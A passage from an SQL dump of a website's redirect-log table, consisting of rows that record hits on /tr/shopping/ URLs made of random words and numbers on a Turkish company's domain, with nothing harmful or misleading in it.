00:00:00',301),(74700,'https://3s-technologies.com.tr/tr/shopping/bezonian/330406028.html',NULL,'https://3s-technologies.com.tr/shopping/bezonian/330406028.html','',1,0,'2026-06-11 06:54:04','0000-00-00 00:00:00',301),(74701,'https://3s-technologies.com.tr/tr/shopping/exported/1626583894.html',NULL,'https://3s-technologies.com.tr/shopping/exported/1626583894.html','',1,0,'2026-06-11 06:54:07','0000-00-00 00:00:00',301),(74702,'https://3s-technologies.com.tr/tr/shopping/grammaticized/3187355276.html',NULL,'https://3s-technologies.com.tr/shopping/grammaticized/3187355276.html','',1,0,'2026-06-11 06:54:10','0000-00-00 00:00:00',301),(74703,'https://3s-technologies.com.tr/tr/shopping/clycerole/4121052431.html',NULL,'https://3s-technologies.com.tr/shopping/clycerole/4121052431.html','',1,0,'2026-06-11 06:54:13','0000-00-00 00:00:00',301),(74704,'https://3s-technologies.com.tr/tr/shopping/toged/3072654993.html',NULL,'https://3s-technologies.com.tr/shopping/toged/3072654993.html','',1,0,'2026-06-11 06:54:16','0000-00-00 00:00:00',301),(74705,'https://3s-technologies.com.tr/tr/shopping/postulatory/572222062.html',NULL,'https://3s-technologies.com.tr/shopping/postulatory/572222062.html','',1,0,'2026-06-11 06:54:19','0000-00-00 00:00:00',301),(74706,'https://3s-technologies.com.tr/tr/shopping/chavender/4051174027.html',NULL,'https://3s-technologies.com.tr/shopping/chavender/4051174027.html','',1,0,'2026-06-11 06:54:22','0000-00-00 00:00:00',301),(74707,'https://3s-technologies.com.tr/tr/shopping/lactate/1935648476.html',NULL,'https://3s-technologies.com.tr/shopping/lactate/1935648476.html','',1,0,'2026-06-11 06:54:25','0000-00-00 00:00:00',301),(74708,'https://3s-technologies.com.tr/tr/shopping/disapointed/2013870080.html',NULL,'https://3s-technologies.com.tr/shopping/disapointed/2013870080.html','',1,0,'2026-06-11 06:54:28','0000-00-00 00:00:00',301),(74709,'https://3s-technologies.com.tr/tr/shopping/urechitoxin/968501790.html',NULL,'https://3s-technologies.com.tr/shopping/urechitoxin/968501790.html','',1,0,'2026-06-11 06:54:31','0000-00-00 00:00:00',301),(74710,'https://3s-technologies.com.tr/tr/shopping/peases/2371268467.html',NULL,'https://3s-technologies.com.tr/shopping/peases/2371268467.html','',1,0,'2026-06-11 06:54:34','0000-00-00 00:00:00',301),(74711,'https://3s-technologies.com.tr/tr/shopping/squealed/3561014750.html',NULL,'https://3s-technologies.com.tr/shopping/squealed/3561014750.html','',1,0,'2026-06-11 06:54:37','0000-00-00 00:00:00',301),(74712,'https://3s-technologies.com.tr/tr/shopping/embracing/177899051.html',NULL,'https://3s-technologies.com.tr/shopping/embracing/177899051.html','',1,0,'2026-06-11 06:54:40','0000-00-00 00:00:00',301),(74713,'https://3s-technologies.com.tr/tr/shopping/pilchard/3513848645.html',NULL,'https://3s-technologies.com.tr/shopping/pilchard/3513848645.html','',1,0,'2026-06-11 06:54:43','0000-00-00 00:00:00',301),(74714,'https://3s-technologies.com.tr/tr/shopping/kissing/3879540339.html',NULL,'https://3s-technologies.com.tr/shopping/kissing/3879540339.html','',1,0,'2026-06-11 06:54:46','0000-00-00 00:00:00',301),(74715,'https://3s-technologies.com.tr/tr/shopping/mastoid/302941386.html',NULL,'https://3s-technologies.com.tr/shopping/mastoid/302941386.html','',1,0,'2026-06-11 06:54:49','0000-00-00 00:00:00',301),(74716,'https://3s-technologies.com.tr/tr/shopping/reputably/2268333481.html',NULL,'https://3s-technologies.com.tr/shopping/reputably/2268333481.html','',1,0,'2026-06-11 06:54:53','0000-00-00 00:00:00',301),(74717,'https://3s-technologies.com.tr/tr/shopping/stoneweed/1673404657.html',NULL,'https://3s-technologies.com.tr/shopping/stoneweed/1673404657.html','',1,0,'2026-06-11 06:54:56','0000-00-00 00:00:00',301),(74718,'https://3s-technologies.com.tr/tr/shopping/freshmanship/1253156149.html',NULL,'https://3s-technologies.com.tr/shopping/freshmanship/1253156149.html','',1,0,'2026-06-11 06:54:58','0000-00-00 00:00:00',301),(74719,'https://3s-technologies.com.tr/tr/shopping/suite/2246062609.html',NULL,'https://3s-technologies.com.tr/shopping/suite/2246062609.html','',1,0,'2026-06-11 06:55:01','0000-00-00 00:00:00',301),(74720,'https://3s-technologies.com.tr/tr/shopping/whereinto/1964507020.html',NULL,'https://3s-technologies.com.tr/shopping/whereinto/1964507020.html','',1,0,'2026-06-11 06:55:04','0000-00-00 00:00:00',301),(74721,'https://3s-technologies.com.tr/tr/shopping/hyponastic/2192654206.html',NULL,'https://3s-technologies.com.tr/shopping/hyponastic/2192654206.html','',1,0,'2026-06-11 06:55:07','0000-00-00 00:00:00',301),(74722,'https://3s-technologies.com.tr/tr/shopping/mascle/2587116869.html',NULL,'https://3s-technologies.com.tr/shopping/mascle/2587116869.html','',1,0,'2026-06-11 06:55:10','0000-00-00 00:00:00',301),(74723,'https://3s-technologies.com.tr/tr/shopping/rhaphides/1087882906.html',NULL,'https://3s-technologies.com.tr/shopping/rhaphides/1087882906.html','',1,0,'2026-06-11 06:55:13','0000-00-00 00:00:00',301),(74724,'https://3s-technologies.com.tr/tr/shopping/papboat/643312549.html',NULL,'https://3s-technologies.com.tr/shopping/papboat/643312549.html','',1,0,'2026-06-11 06:55:16','0000-00-00 00:00:00',301),(74725,'https://3s-technologies.com.tr/tr/shopping/tanistry/1680926508.html',NULL,'https://3s-technologies.com.tr/shopping/tanistry/1680926508.html','',1,0,'2026-06-11 06:55:19','0000-00-00 00:00:00',301),(74726,'https://3s-technologies.com.tr/tr/shopping/wattled/3363765866.html',NULL,'https://3s-technologies.com.tr/shopping/wattled/3363765866.html','',1,0,'2026-06-11 06:55:22','0000-00-00 00:00:00',301),(74727,'https://3s-technologies.com.tr/tr/shopping/aucuba/2533001498.html',NULL,'https://3s-technologies.com.tr/shopping/aucuba/2533001498.html','',1,0,'2026-06-11 06:55:25','0000-00-00 00:00:00',301),(74728,'https://3s-technologies.com.tr/tr/shopping/hoofed/2807823453.html',NULL,'https://3s-technologies.com.tr/shopping/hoofed/2807823453.html','',1,0,'2026-06-11 06:55:28','0000-00-00 00:00:00',301),(74729,'https://3s-technologies.com.tr/tr/shopping/tenebrose/3153907928.html',NULL,'https://3s-technologies.com.tr/shopping/tenebrose/3153907928.html','',1,0,'2026-06-11 06:55:33','0000-00-00 00:00:00',301),(74730,'https://3s-technologies.com.tr/tr/shopping/tertiate/210134284.html',NULL,'https://3s-technologies.com.tr/shopping/tertiate/210134284.html','',1,0,'2026-06-11 06:55:35','0000-00-00 00:00:00',301),(74731,'https://3s-technologies.com.tr/tr/shopping/filiate/2229478211.html',NULL,'https://3s-technologies.com.tr/shopping/filiate/2229478211.html','',1,0,'2026-06-11 06:55:38','0000-00-00 00:00:00',301),(74732,'https://3s-technologies.com.tr/tr/shopping/ornithopus/3039600610.html',NULL,'https://3s-technologies.com.tr/shopping/ornithopus/3039600610.html','',1,0,'2026-06-11 06:55:44','0000-00-00 00:00:00',301),(74733,'https://3s-technologies.com.tr/tr/shopping/intractableness/642100466.html',NULL,'https://3s-technologies.com.tr/shopping/intractableness/642100466.html','',1,0,'2026-06-11 06:55:48','0000-00-00 00:00:00',301),(74734,'https://3s-technologies.com.tr/tr/shopping/antistrumatic/657544757.html',NULL,'https://3s-technologies.com.tr/shopping/antistrumatic/657544757.html','',1,0,'2026-06-11 06:55:51','0000-00-00 00:00:00',301),(74735,'https://3s-technologies.com.tr/tr/shopping/torilto/1849473546.html',NULL,'https://3s-technologies.com.tr/shopping/torilto/1849473546.html','',1,0,'2026-06-11 06:55:54','0000-00-00 00:00:00',301),(74736,'https://3s-technologies.com.tr/tr/shopping/midheaven/677883567.html',NULL,'https://3s-technologies.com.tr/shopping/midheaven/677883567.html','',1,0,'2026-06-11 06:55:57','0000-00-00 00:00:00',301),(74737,'https://3s-technologies.com.tr/tr/shopping/mosstone/1530602599.html',NULL,'https://3s-technologies.com.tr/shopping/mosstone/1530602599.html','',1,0,'2026-06-11 06:56:00','0000-00-00 00:00:00',301),(74738,'https://3s-technologies.com.tr/tr/shopping/dishumor/53476016.html',NULL,'https://3s-technologies.com.tr/shopping/dishumor/53476016.html','',1,0,'2026-06-11 06:56:03','0000-00-00 00:00:00',301),(74739,'https://3s-technologies.com.tr/tr/shopping/fussily/1277401196.html',NULL,'https://3s-technologies.com.tr/shopping/fussily/1277401196.html','',1,0,'2026-06-11 06:56:06','0000-00-00 00:00:00',301),(74740,'https://3s-technologies.com.tr/tr/shopping/prettiest/2909969471.html',NULL,'https://3s-technologies.com.tr/shopping/prettiest/2909969471.html','',1,0,'2026-06-11 06:56:09','0000-00-00 00:00:00',301),(74741,'https://3s-technologies.com.tr/tr/shopping/misexposition/1602645593.html',NULL,'https://3s-technologies.com.tr/shopping/misexposition/1602645593.html','',1,0,'2026-06-11 06:56:12','0000-00-00 00:00:00',301),(74742,'https://3s-technologies.com.tr/tr/shopping/trammel/1390332908.html',NULL,'https://3s-technologies.com.tr/shopping/trammel/1390332908.html','',1,0,'2026-06-11 06:56:15','0000-00-00 00:00:00',301),(74743,'https://3s-technologies.com.tr/tr/shopping/cobwebby/3906796050.html',NULL,'https://3s-technologies.com.tr/shopping/cobwebby/3906796050.html','',1,0,'2026-06-11 06:56:18','0000-00-00 00:00:00',301),(74744,'https://3s-technologies.com.tr/tr/shopping/xerus/2694500991.html',NULL,'https://3s-technologies.com.tr/shopping/xerus/2694500991.html','',1,0,'2026-06-11 06:56:21','0000-00-00 00:00:00',301),(74745,'https://3s-technologies.com.tr/tr/shopping/stallage/238206059.html',NULL,'https://3s-technologies.com.tr/shopping/stallage/238206059.html','',1,0,'2026-06-11 06:56:24','0000-00-00 00:00:00',301),(74746,'https://3s-technologies.com.tr/tr/shopping/bollard/2200619667.html',NULL,'https://3s-technologies.com.tr/shopping/bollard/2200619667.html','',1,0,'2026-06-11 06:56:27','0000-00-00 00:00:00',301),(74747,'https://3s-technologies.com.tr/tr/shopping/ursus/3763793695.html',NULL,'https://3s-technologies.com.tr/shopping/ursus/3763793695.html','',1,0,'2026-06-11 06:56:30','0000-00-00 00:00:00',301),(74748,'https://3s-technologies.com.tr/tr/shopping/alitrunk/4065581228.html',NULL,'https://3s-technologies.com.tr/shopping/alitrunk/4065581228.html','',1,0,'2026-06-11 06:56:40','0000-00-00 00:00:00',301),(74749,'https://3s-technologies.com.tr/tr/shopping/depreciatory/2362452305.html',NULL,'https://3s-technologies.com.tr/shopping/depreciatory/2362452305.html','',1,0,'2026-06-11 06:56:42','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (74750,'https://3s-technologies.com.tr/tr/shopping/velvetleaf/3492348445.html',NULL,'https://3s-technologies.com.tr/shopping/velvetleaf/3492348445.html','',1,0,'2026-06-11 06:56:45','0000-00-00 00:00:00',301),(74751,'https://3s-technologies.com.tr/tr/shopping/sandbox/1329848592.html',NULL,'https://3s-technologies.com.tr/shopping/sandbox/1329848592.html','',1,0,'2026-06-11 06:56:48','0000-00-00 00:00:00',301),(74752,'https://3s-technologies.com.tr/tr/shopping/culverkey/4247306881.html',NULL,'https://3s-technologies.com.tr/shopping/culverkey/4247306881.html','',1,0,'2026-06-11 06:56:51','0000-00-00 00:00:00',301),(74753,'https://3s-technologies.com.tr/tr/shopping/perpetrate/2732144162.html',NULL,'https://3s-technologies.com.tr/shopping/perpetrate/2732144162.html','',1,0,'2026-06-11 06:56:54','0000-00-00 00:00:00',301),(74754,'https://3s-technologies.com.tr/tr/shopping/gamester/4212647434.html',NULL,'https://3s-technologies.com.tr/shopping/gamester/4212647434.html','',1,0,'2026-06-11 06:56:57','0000-00-00 00:00:00',301),(74755,'https://3s-technologies.com.tr/tr/shopping/annuloid/2883275517.html',NULL,'https://3s-technologies.com.tr/shopping/annuloid/2883275517.html','',1,0,'2026-06-11 06:57:00','0000-00-00 00:00:00',301),(74756,'https://3s-technologies.com.tr/tr/shopping/dactyliography/961325281.html',NULL,'https://3s-technologies.com.tr/shopping/dactyliography/961325281.html','',1,0,'2026-06-11 06:57:03','0000-00-00 00:00:00',301),(74757,'https://3s-technologies.com.tr/tr/shopping/shucker/3510308449.html',NULL,'https://3s-technologies.com.tr/shopping/shucker/3510308449.html','',1,0,'2026-06-11 06:57:06','0000-00-00 00:00:00',301),(74758,'https://3s-technologies.com.tr/tr/shopping/hamshackle/2351143889.html',NULL,'https://3s-technologies.com.tr/shopping/hamshackle/2351143889.html','',1,0,'2026-06-11 06:57:09','0000-00-00 00:00:00',301),(74759,'https://3s-technologies.com.tr/tr/shopping/hiation/3080783977.html',NULL,'https://3s-technologies.com.tr/shopping/hiation/3080783977.html','',1,0,'2026-06-11 06:57:12','0000-00-00 00:00:00',301),(74760,'https://3s-technologies.com.tr/tr/shopping/peters/2965133402.html',NULL,'https://3s-technologies.com.tr/shopping/peters/2965133402.html','',1,0,'2026-06-11 06:57:16','0000-00-00 00:00:00',301),(74761,'https://3s-technologies.com.tr/tr/shopping/belate/2977911851.html',NULL,'https://3s-technologies.com.tr/shopping/belate/2977911851.html','',1,0,'2026-06-11 06:57:18','0000-00-00 00:00:00',301),(74762,'https://3s-technologies.com.tr/tr/shopping/vigesimal/2717213290.html',NULL,'https://3s-technologies.com.tr/shopping/vigesimal/2717213290.html','',1,0,'2026-06-11 06:57:21','0000-00-00 00:00:00',301),(74763,'https://3s-technologies.com.tr/tr/shopping/coronarium/1668815869.html',NULL,'https://3s-technologies.com.tr/shopping/coronarium/1668815869.html','',1,0,'2026-06-11 06:57:24','0000-00-00 00:00:00',301),(74764,'https://3s-technologies.com.tr/tr/shopping/bezzling/2776686681.html',NULL,'https://3s-technologies.com.tr/shopping/bezzling/2776686681.html','',1,0,'2026-06-11 06:57:27','0000-00-00 00:00:00',301),(74765,'https://3s-technologies.com.tr/tr/shopping/carousing/1592291374.html',NULL,'https://3s-technologies.com.tr/shopping/carousing/1592291374.html','',1,0,'2026-06-11 06:57:30','0000-00-00 00:00:00',301),(74766,'https://3s-technologies.com.tr/tr/shopping/longitude/2429398617.html',NULL,'https://3s-technologies.com.tr/shopping/longitude/2429398617.html','',1,0,'2026-06-11 06:57:33','0000-00-00 00:00:00',301),(74767,'https://3s-technologies.com.tr/tr/shopping/posthouse/2166577353.html',NULL,'https://3s-technologies.com.tr/shopping/posthouse/2166577353.html','',1,0,'2026-06-11 06:57:36','0000-00-00 00:00:00',301),(74768,'https://3s-technologies.com.tr/tr/shopping/zoogloea/2327098301.html',NULL,'https://3s-technologies.com.tr/shopping/zoogloea/2327098301.html','',1,0,'2026-06-11 06:57:39','0000-00-00 00:00:00',301),(74769,'https://3s-technologies.com.tr/tr/shopping/floored/2557499836.html',NULL,'https://3s-technologies.com.tr/shopping/floored/2557499836.html','',1,0,'2026-06-11 06:57:42','0000-00-00 00:00:00',301),(74770,'https://3s-technologies.com.tr/tr/shopping/sackcloth/4054550716.html',NULL,'https://3s-technologies.com.tr/shopping/sackcloth/4054550716.html','',1,0,'2026-06-11 06:57:45','0000-00-00 00:00:00',301),(74771,'https://3s-technologies.com.tr/tr/shopping/toxicant/3327692319.html',NULL,'https://3s-technologies.com.tr/shopping/toxicant/3327692319.html','',1,0,'2026-06-11 06:57:49','0000-00-00 00:00:00',301),(74772,'https://3s-technologies.com.tr/tr/shopping/molotov/3841897184.html',NULL,'https://3s-technologies.com.tr/shopping/molotov/3841897184.html','',1,0,'2026-06-11 06:57:51','0000-00-00 00:00:00',301),(74773,'https://3s-technologies.com.tr/tr/shopping/postliminiary/228877111.html',NULL,'https://3s-technologies.com.tr/shopping/postliminiary/228877111.html','',1,0,'2026-06-11 06:57:54','0000-00-00 00:00:00',301),(74774,'https://3s-technologies.com.tr/tr/shopping/dragooner/2886045057.html',NULL,'https://3s-technologies.com.tr/shopping/dragooner/2886045057.html','',1,0,'2026-06-11 06:57:57','0000-00-00 00:00:00',301),(74775,'https://3s-technologies.com.tr/tr/shopping/grundel/3387569486.html',NULL,'https://3s-technologies.com.tr/shopping/grundel/3387569486.html','',1,0,'2026-06-11 06:58:00','0000-00-00 00:00:00',301),(74776,'https://3s-technologies.com.tr/tr/shopping/abortiveness/2738247354.html',NULL,'https://3s-technologies.com.tr/shopping/abortiveness/2738247354.html','',1,0,'2026-06-11 06:58:03','0000-00-00 00:00:00',301),(74777,'https://3s-technologies.com.tr/tr/shopping/jibed/1231187598.html',NULL,'https://3s-technologies.com.tr/shopping/jibed/1231187598.html','',1,0,'2026-06-11 06:58:06','0000-00-00 00:00:00',301),(74778,'https://3s-technologies.com.tr/tr/shopping/dinaphthyl/3470694674.html',NULL,'https://3s-technologies.com.tr/shopping/dinaphthyl/3470694674.html','',1,0,'2026-06-11 06:58:09','0000-00-00 00:00:00',301),(74779,'https://3s-technologies.com.tr/tr/shopping/assassination/1618025650.html',NULL,'https://3s-technologies.com.tr/shopping/assassination/1618025650.html','',1,0,'2026-06-11 06:58:12','0000-00-00 00:00:00',301),(74780,'https://3s-technologies.com.tr/tr/shopping/borshch/2574247741.html',NULL,'https://3s-technologies.com.tr/shopping/borshch/2574247741.html','',1,0,'2026-06-11 06:58:16','0000-00-00 00:00:00',301),(74781,'https://3s-technologies.com.tr/tr/shopping/glume/3406040538.html',NULL,'https://3s-technologies.com.tr/shopping/glume/3406040538.html','',1,0,'2026-06-11 06:58:18','0000-00-00 00:00:00',301),(74782,'https://3s-technologies.com.tr/tr/shopping/fricace/2872552667.html',NULL,'https://3s-technologies.com.tr/shopping/fricace/2872552667.html','',1,0,'2026-06-11 06:58:21','0000-00-00 00:00:00',301),(74783,'https://3s-technologies.com.tr/tr/shopping/acrididae/3761767903.html',NULL,'https://3s-technologies.com.tr/shopping/acrididae/3761767903.html','',1,0,'2026-06-11 06:58:25','0000-00-00 00:00:00',301),(74784,'https://3s-technologies.com.tr/tr/shopping/acinaciform/2446720531.html',NULL,'https://3s-technologies.com.tr/shopping/acinaciform/2446720531.html','',1,0,'2026-06-11 06:58:28','0000-00-00 00:00:00',301),(74785,'https://3s-technologies.com.tr/tr/shopping/swaggie/1854534307.html',NULL,'https://3s-technologies.com.tr/shopping/swaggie/1854534307.html','',1,0,'2026-06-11 06:58:33','0000-00-00 00:00:00',301),(74786,'https://3s-technologies.com.tr/tr/shopping/coalwhipper/3901133945.html',NULL,'https://3s-technologies.com.tr/shopping/coalwhipper/3901133945.html','',1,0,'2026-06-11 06:58:37','0000-00-00 00:00:00',301),(74787,'https://3s-technologies.com.tr/tr/shopping/paterae/948178217.html',NULL,'https://3s-technologies.com.tr/shopping/paterae/948178217.html','',1,0,'2026-06-11 06:58:40','0000-00-00 00:00:00',301),(74788,'https://3s-technologies.com.tr/tr/shopping/sasin/300788963.html',NULL,'https://3s-technologies.com.tr/shopping/sasin/300788963.html','',1,0,'2026-06-11 06:58:43','0000-00-00 00:00:00',301),(74789,'https://3s-technologies.com.tr/tr/shopping/campanle/4171766372.html',NULL,'https://3s-technologies.com.tr/shopping/campanle/4171766372.html','',1,0,'2026-06-11 06:58:46','0000-00-00 00:00:00',301),(74790,'https://3s-technologies.com.tr/tr/shopping/saccharomyces/3560201057.html',NULL,'https://3s-technologies.com.tr/shopping/saccharomyces/3560201057.html','',1,0,'2026-06-11 06:58:49','0000-00-00 00:00:00',301),(74791,'https://3s-technologies.com.tr/tr/shopping/calabar/194217696.html',NULL,'https://3s-technologies.com.tr/shopping/calabar/194217696.html','',1,0,'2026-06-11 06:58:52','0000-00-00 00:00:00',301),(74792,'https://3s-technologies.com.tr/tr/shopping/bicyanide/3746249048.html',NULL,'https://3s-technologies.com.tr/shopping/bicyanide/3746249048.html','',1,0,'2026-06-11 06:58:55','0000-00-00 00:00:00',301),(74793,'https://3s-technologies.com.tr/tr/shopping/dunderheaded/3094988709.html',NULL,'https://3s-technologies.com.tr/shopping/dunderheaded/3094988709.html','',1,0,'2026-06-11 06:58:58','0000-00-00 00:00:00',301),(74794,'https://3s-technologies.com.tr/tr/shopping/fumades/1965719119.html',NULL,'https://3s-technologies.com.tr/shopping/fumades/1965719119.html','',1,0,'2026-06-11 06:59:03','0000-00-00 00:00:00',301),(74795,'https://3s-technologies.com.tr/tr/shopping/confervous/1202556265.html',NULL,'https://3s-technologies.com.tr/shopping/confervous/1202556265.html','',1,0,'2026-06-11 06:59:07','0000-00-00 00:00:00',301),(74796,'https://3s-technologies.com.tr/tr/shopping/limousine/2374705801.html',NULL,'https://3s-technologies.com.tr/shopping/limousine/2374705801.html','',1,0,'2026-06-11 06:59:10','0000-00-00 00:00:00',301),(74797,'https://3s-technologies.com.tr/tr/shopping/inflowing/2121058480.html',NULL,'https://3s-technologies.com.tr/shopping/inflowing/2121058480.html','',1,0,'2026-06-11 06:59:13','0000-00-00 00:00:00',301),(74798,'https://3s-technologies.com.tr/tr/shopping/spizella/428065032.html',NULL,'https://3s-technologies.com.tr/shopping/spizella/428065032.html','',1,0,'2026-06-11 06:59:16','0000-00-00 00:00:00',301),(74799,'https://3s-technologies.com.tr/tr/shopping/unclosed/3677885064.html',NULL,'https://3s-technologies.com.tr/shopping/unclosed/3677885064.html','',1,0,'2026-06-11 06:59:19','0000-00-00 00:00:00',301),(74800,'https://3s-technologies.com.tr/tr/shopping/thylogale/2052725334.html',NULL,'https://3s-technologies.com.tr/shopping/thylogale/2052725334.html','',1,0,'2026-06-11 06:59:22','0000-00-00 00:00:00',301),(74801,'https://3s-technologies.com.tr/tr/shopping/softspoken/4068005426.html',NULL,'https://3s-technologies.com.tr/shopping/softspoken/4068005426.html','',1,0,'2026-06-11 06:59:25','0000-00-00 00:00:00',301),(74802,'https://3s-technologies.com.tr/tr/shopping/alcarraza/374031905.html',NULL,'https://3s-technologies.com.tr/shopping/alcarraza/374031905.html','',1,0,'2026-06-11 06:59:28','0000-00-00 00:00:00',301),(74803,'https://3s-technologies.com.tr/tr/shopping/malaise/875778150.html',NULL,'https://3s-technologies.com.tr/shopping/malaise/875778150.html','',1,0,'2026-06-11 06:59:31','0000-00-00 00:00:00',301),(74804,'https://3s-technologies.com.tr/tr/shopping/terebinthus/868822683.html',NULL,'https://3s-technologies.com.tr/shopping/terebinthus/868822683.html','',1,0,'2026-06-11 06:59:36','0000-00-00 00:00:00',301),(74805,'https://3s-technologies.com.tr/tr/shopping/moroxylate/1742070962.html',NULL,'https://3s-technologies.com.tr/shopping/moroxylate/1742070962.html','',1,0,'2026-06-11 06:59:41','0000-00-00 00:00:00',301),(74806,'https://3s-technologies.com.tr/tr/shopping/paginate/2839831443.html',NULL,'https://3s-technologies.com.tr/shopping/paginate/2839831443.html','',1,0,'2026-06-11 06:59:45','0000-00-00 00:00:00',301),(74807,'https://3s-technologies.com.tr/tr/shopping/creamer/1210760683.html',NULL,'https://3s-technologies.com.tr/shopping/creamer/1210760683.html','',1,0,'2026-06-11 06:59:48','0000-00-00 00:00:00',301),(74808,'https://3s-technologies.com.tr/tr/shopping/amphibologically/1090307120.html',NULL,'https://3s-technologies.com.tr/shopping/amphibologically/1090307120.html','',1,0,'2026-06-11 06:59:51','0000-00-00 00:00:00',301),(74809,'https://3s-technologies.com.tr/tr/shopping/tentif/3024458624.html',NULL,'https://3s-technologies.com.tr/shopping/tentif/3024458624.html','',1,0,'2026-06-11 06:59:54','0000-00-00 00:00:00',301),(74810,'https://3s-technologies.com.tr/tr/shopping/shambled/3800224767.html',NULL,'https://3s-technologies.com.tr/shopping/shambled/3800224767.html','',1,0,'2026-06-11 06:59:57','0000-00-00 00:00:00',301),(74811,'https://3s-technologies.com.tr/tr/shopping/grandee/3151622544.html',NULL,'https://3s-technologies.com.tr/shopping/grandee/3151622544.html','',1,0,'2026-06-11 07:00:02','0000-00-00 00:00:00',301),(74812,'https://3s-technologies.com.tr/tr/shopping/gamesome/3856220891.html',NULL,'https://3s-technologies.com.tr/shopping/gamesome/3856220891.html','',1,0,'2026-06-11 07:00:04','0000-00-00 00:00:00',301),(74813,'https://3s-technologies.com.tr/tr/shopping/vitriolize/4103617332.html',NULL,'https://3s-technologies.com.tr/shopping/vitriolize/4103617332.html','',1,0,'2026-06-11 07:00:07','0000-00-00 00:00:00',301),(74814,'https://3s-technologies.com.tr/tr/shopping/glassblower/605669394.html',NULL,'https://3s-technologies.com.tr/shopping/glassblower/605669394.html','',1,0,'2026-06-11 07:00:10','0000-00-00 00:00:00',301),(74815,'https://3s-technologies.com.tr/tr/shopping/unaffected/1790481531.html',NULL,'https://3s-technologies.com.tr/shopping/unaffected/1790481531.html','',1,0,'2026-06-11 07:00:13','0000-00-00 00:00:00',301),(74816,'https://3s-technologies.com.tr/tr/shopping/earliest/1390882538.html',NULL,'https://3s-technologies.com.tr/shopping/earliest/1390882538.html','',1,0,'2026-06-11 07:00:16','0000-00-00 00:00:00',301),(74817,'https://3s-technologies.com.tr/tr/shopping/conjugate/2639476696.html',NULL,'https://3s-technologies.com.tr/shopping/conjugate/2639476696.html','',1,0,'2026-06-11 07:00:19','0000-00-00 00:00:00',301),(74818,'https://3s-technologies.com.tr/tr/shopping/adumbrate/482117592.html',NULL,'https://3s-technologies.com.tr/shopping/adumbrate/482117592.html','',1,0,'2026-06-11 07:00:22','0000-00-00 00:00:00',301),(74819,'https://3s-technologies.com.tr/tr/shopping/knottiness/2613042366.html',NULL,'https://3s-technologies.com.tr/shopping/knottiness/2613042366.html','',1,0,'2026-06-11 07:00:25','0000-00-00 00:00:00',301),(74820,'https://3s-technologies.com.tr/tr/shopping/amylopsin/3705229188.html',NULL,'https://3s-technologies.com.tr/shopping/amylopsin/3705229188.html','',1,0,'2026-06-11 07:00:28','0000-00-00 00:00:00',301),(74821,'https://3s-technologies.com.tr/tr/shopping/adductor/3851632087.html',NULL,'https://3s-technologies.com.tr/shopping/adductor/3851632087.html','',1,0,'2026-06-11 07:00:31','0000-00-00 00:00:00',301),(74822,'https://3s-technologies.com.tr/tr/shopping/thromboblast/1817964437.html',NULL,'https://3s-technologies.com.tr/shopping/thromboblast/1817964437.html','',1,0,'2026-06-11 07:00:34','0000-00-00 00:00:00',301),(74823,'https://3s-technologies.com.tr/tr/shopping/entrammel/1358515333.html',NULL,'https://3s-technologies.com.tr/shopping/entrammel/1358515333.html','',1,0,'2026-06-11 07:00:37','0000-00-00 00:00:00',301),(74824,'https://3s-technologies.com.tr/tr/shopping/marginata/3990184452.html',NULL,'https://3s-technologies.com.tr/shopping/marginata/3990184452.html','',1,0,'2026-06-11 07:00:43','0000-00-00 00:00:00',301),(74825,'https://3s-technologies.com.tr/tr/shopping/importuner/4174584390.html',NULL,'https://3s-technologies.com.tr/shopping/importuner/4174584390.html','',1,0,'2026-06-11 07:00:45','0000-00-00 00:00:00',301),(74826,'https://3s-technologies.com.tr/tr/shopping/accelerative/339605142.html',NULL,'https://3s-technologies.com.tr/shopping/accelerative/339605142.html','',1,0,'2026-06-11 07:00:48','0000-00-00 00:00:00',301),(74827,'https://3s-technologies.com.tr/tr/shopping/additory/2744442077.html',NULL,'https://3s-technologies.com.tr/shopping/additory/2744442077.html','',1,0,'2026-06-11 07:00:51','0000-00-00 00:00:00',301),(74828,'https://3s-technologies.com.tr/tr/shopping/subcontract/341933255.html',NULL,'https://3s-technologies.com.tr/shopping/subcontract/341933255.html','',1,0,'2026-06-11 07:00:54','0000-00-00 00:00:00',301),(74829,'https://3s-technologies.com.tr/tr/shopping/imploratory/2775724803.html',NULL,'https://3s-technologies.com.tr/shopping/imploratory/2775724803.html','',1,0,'2026-06-11 07:00:57','0000-00-00 00:00:00',301),(74830,'https://3s-technologies.com.tr/tr/shopping/cometary/1163142324.html',NULL,'https://3s-technologies.com.tr/shopping/cometary/1163142324.html','',1,0,'2026-06-11 07:01:00','0000-00-00 00:00:00',301),(74831,'https://3s-technologies.com.tr/tr/shopping/hazardable/3912340587.html',NULL,'https://3s-technologies.com.tr/shopping/hazardable/3912340587.html','',1,0,'2026-06-11 07:01:04','0000-00-00 00:00:00',301),(74832,'https://3s-technologies.com.tr/tr/shopping/chaining/3043769509.html',NULL,'https://3s-technologies.com.tr/shopping/chaining/3043769509.html','',1,0,'2026-06-11 07:01:11','0000-00-00 00:00:00',301),(74833,'https://3s-technologies.com.tr/tr/shopping/seemless/2817966149.html',NULL,'https://3s-technologies.com.tr/shopping/seemless/2817966149.html','',1,0,'2026-06-11 07:01:15','0000-00-00 00:00:00',301),(74834,'https://3s-technologies.com.tr/tr/shopping/weapons/3128507368.html',NULL,'https://3s-technologies.com.tr/shopping/weapons/3128507368.html','',1,0,'2026-06-11 07:01:18','0000-00-00 00:00:00',301),(74835,'https://3s-technologies.com.tr/tr/shopping/ventilation/1951928030.html',NULL,'https://3s-technologies.com.tr/shopping/ventilation/1951928030.html','',1,0,'2026-06-11 07:01:21','0000-00-00 00:00:00',301),(74836,'https://3s-technologies.com.tr/tr/shopping/owning/2039375672.html',NULL,'https://3s-technologies.com.tr/shopping/owning/2039375672.html','',1,0,'2026-06-11 07:01:24','0000-00-00 00:00:00',301),(74837,'https://3s-technologies.com.tr/tr/shopping/cedrorum/224856397.html',NULL,'https://3s-technologies.com.tr/shopping/cedrorum/224856397.html','',1,0,'2026-06-11 07:01:27','0000-00-00 00:00:00',301),(74838,'https://3s-technologies.com.tr/tr/shopping/ogling/3692650198.html',NULL,'https://3s-technologies.com.tr/shopping/ogling/3692650198.html','',1,0,'2026-06-11 07:01:30','0000-00-00 00:00:00',301),(74839,'https://3s-technologies.com.tr/tr/shopping/misconceive/4032630611.html',NULL,'https://3s-technologies.com.tr/shopping/misconceive/4032630611.html','',1,0,'2026-06-11 07:01:33','0000-00-00 00:00:00',301),(74840,'https://3s-technologies.com.tr/tr/shopping/guardable/3084789369.html',NULL,'https://3s-technologies.com.tr/shopping/guardable/3084789369.html','',1,0,'2026-06-11 